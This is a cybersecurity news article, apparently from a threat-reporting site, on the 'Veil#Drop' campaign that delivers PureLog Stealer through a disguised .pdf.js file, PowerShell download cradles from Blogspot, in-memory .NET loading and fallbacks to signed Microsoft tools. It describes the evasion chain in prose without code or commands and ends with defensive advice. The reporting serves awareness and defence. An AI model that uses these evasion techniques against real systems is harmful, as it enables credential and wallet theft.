Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Alibaba Bans Internal Use of Claude AI Over Backdoor Concerns
July 3, 2026
Apache ActiveMQ Critical Vulnerabilities Allow DoS Attacks, System Crashes
July 3, 2026
Scammers Impersonate Brands in Gambling Ads to Drive Casino Traffic
July 3, 2026
Home/Threats/PureLog Stealer Uses Blogspot and PowerShell to Deliver Malware
Threats

PureLog Stealer Uses Blogspot and PowerShell to Deliver Malware

Key Takeaways A novel attack chain, dubbed Veil#Drop, leverages Google Blogspot and native Windows tools to deploy the PureLog Stealer. The attack uses deceptive file extensions and memory-resident...

Emy Elsamnoudy
Emy Elsamnoudy
July 3, 2026 5 Min Read
2 0

Key Takeaways

  • A novel attack chain, dubbed Veil#Drop, leverages Google Blogspot and native Windows tools to deploy the PureLog Stealer.
  • The attack uses deceptive file extensions and memory-resident execution to evade traditional antivirus detection.
  • PureLog Stealer targets sensitive user data, including browser credentials, cookies, and cryptocurrency wallet information.
  • Detection relies on behavioral monitoring of PowerShell activity and network connections, rather than signature-based scanning.

Cybersecurity researchers have uncovered a sophisticated new malware campaign that exploits Google’s Blogspot platform and standard Windows utilities to deliver the PureLog Stealer. This attack chain, named Veil#Drop, is designed to bypass conventional security measures by masquerading malicious activities as routine system operations.

Table Of Content

  • Key Takeaways
  • Hackers Abuse Blogspot and PowerShell Download Cradles
  • What PureLog Stealer Does Next
  • What You Should Do

The campaign’s initial vector appears deceptively simple: a file named transcript.pdf.js. While it superficially resembles a legitimate PDF document, its .js extension designates it as a JavaScript file. Due to Windows’ default setting of hiding known file extensions, victims typically only see “transcript.pdf,” making the malicious nature of the file difficult to discern. This subtle deception is crucial to the attack’s success, as users are less likely to suspect a seemingly innocuous PDF document.

Upon execution, the JavaScript file activates the Windows Script Host, which then launches PowerShell. Critically, this PowerShell instance is initiated with its security checks disabled, allowing it to operate without typical restrictions. From this point, PowerShell establishes contact with attacker-controlled Blogspot pages to retrieve subsequent stages of the malware, critically without writing any suspicious files to the local disk. This in-memory execution significantly complicates detection by file-based antivirus solutions.

Researchers from Securonix said in a report that they meticulously documented this sophisticated framework, naming it Veil#Drop. The name reflects the technique of “veiling” malicious actions through layers of encoding and by blending in with legitimate web traffic. Their comprehensive analysis tracked the entire infection sequence, from the initial compromise to the ultimate exfiltration of sensitive data, including browser passwords and cryptocurrency wallet information.

The Veil#Drop campaign is particularly insidious because each step in its execution chain mimics normal system behavior. The use of PowerShell commands, visits to Google Blogspot domains, and reliance on trusted Microsoft utilities are all common occurrences in typical IT environments. This normalcy allows the attack to frequently evade detection by traditional antivirus and endpoint security tools that often overlook such activities.

Hackers Abuse Blogspot and PowerShell Download Cradles

The attack sequence commences when a victim interacts with the fake document hosted on a compromised website. When transcript.pdf.js is double-clicked, Windows Script Host silently passes control to PowerShell, forcing a connection with its execution policy entirely bypassed. This critical step ensures that PowerShell can execute arbitrary commands without triggering security alerts related to policy violations.

PowerShell then employs a “download cradle” technique, which involves fetching malicious code directly from a designated Blogspot page and executing it straight from memory. This method bypasses the need to write intermediate files to the hard drive, making it extremely difficult for many file-scanning tools to detect. By operating in memory, the malware minimizes its footprint on the compromised system, further enhancing its stealth.

The first retrieved payload, named phud.dudus.docx.pdf.olp.sys, immediately takes steps to cover its tracks. It deletes the initial JavaScript launcher, eliminating direct evidence of the infection’s origin, and terminates background processes that could potentially interfere with its operations. Subsequently, it decrypts a hidden payload using a repeating XOR key, revealing further malicious components.

This decrypted script dynamically constructs new Blogspot web addresses by appending random characters. This tactic ensures that each infection instance uses a unique URL, thwarting defenders who attempt to block the campaign using fixed lists of malicious domains. The constant generation of new URLs makes it challenging for security teams to maintain effective blacklists.

The next file fetched, niple.docx.odp.pdf.sys, contains two substantial blocks of encoded numeric data. These blocks are decoded into fully functional .NET programs, which are then loaded directly into memory using reflection. This advanced technique means that no executable file ever touches the disk, making the detection of these stages particularly difficult. Should this primary method of execution fail, the malware incorporates fallback mechanisms. It leverages legitimate, Microsoft-signed tools such as InstallUtil, MSBuild, RegSvcs, and the C# compiler, blending its malicious activity with trusted processes that security software typically ignores.

What PureLog Stealer Does Next

Once the PureLog Stealer is fully active, it systematically harvests a wide array of valuable data from the compromised system. This includes sensitive information such as saved browser passwords, cookies, autofill entries, browsing history, and critical cryptocurrency wallet details. The stealer also meticulously collects comprehensive information about the infected system, providing attackers with a detailed understanding of their compromised environment. All these operations occur stealthily, often without any discernible indicators to the user that their system has been compromised.

Given that the entire attack chain largely operates from memory and avoids writing persistent files to disk, conventional antivirus scans are prone to missing this threat. Security teams are therefore advised to shift their focus towards behavioral monitoring. This includes actively watching for unusual PowerShell activity, such as connections to Blogspot domains, or instances where PowerShell spawns tools it wouldn’t typically interact with. Such anomalous behaviors can serve as crucial early warning signs of an ongoing attack.

What You Should Do

  • Restrict Windows Script Host: Limit or disable the execution of scripts via Windows Script Host (WSH) in environments where it is not essential for business operations.
  • Enable PowerShell Logging: Implement comprehensive PowerShell logging across all endpoints to capture command executions and module activity. Regularly review logs for suspicious patterns and attempts to bypass execution policies.
  • Monitor Network Traffic: Employ network monitoring solutions to detect unusual outbound connections, especially from PowerShell or other legitimate utilities, to cloud platforms like Blogspot. Focus on behavioral anomalies rather than solely relying on domain reputation.
  • Implement Application Control: Utilize application control solutions (e.g., Windows Defender Application Control, AppLocker) to prevent the execution of unauthorized scripts and executables, thereby mitigating fallback techniques that rely on legitimate Microsoft tools.
  • Enforce Least Privilege: Ensure users operate with the principle of least privilege, restricting their ability to execute arbitrary scripts or modify system settings.
  • User Awareness Training: Educate employees about the dangers of deceptive file extensions and the importance of scrutinizing unexpected downloads. Advise caution regarding files with unusual double extensions (e.g., .pdf.js).
  • Regular Backups: Maintain regular, offsite backups of critical data to facilitate recovery in the event of a successful data theft or system compromise.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackHackerMalwareSecurityThreat

Share Article

Emy Elsamnoudy

Emy Elsamnoudy

Emy is a cybersecurity analyst and reporter specializing in threat hunting, defense strategies, and industry trends. With expertise in proactive security measures, Emily covers the tools and techniques organizations use to detect and prevent cyber attacks. She is a regular speaker at security conferences and has contributed to industry reports on threat intelligence and security operations. Emily's reporting focuses on helping organizations improve their security posture through practical, actionable insights.

Previous Post

FBI Warns TeamPCP Hackers Exploit Developer Tools in Supply Chain Attacks

Next Post

Nebula AI Platform Automates Pen Testing to Find Vulnerabilities

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
PureLog Stealer Uses Blogspot and PowerShell to Deliver Malware
July 3, 2026
FBI Warns TeamPCP Hackers Exploit Developer Tools in Supply Chain Attacks
July 3, 2026
SharkLoader Malware Uses Fake Cisco AnyConnect, Google Updates
July 3, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us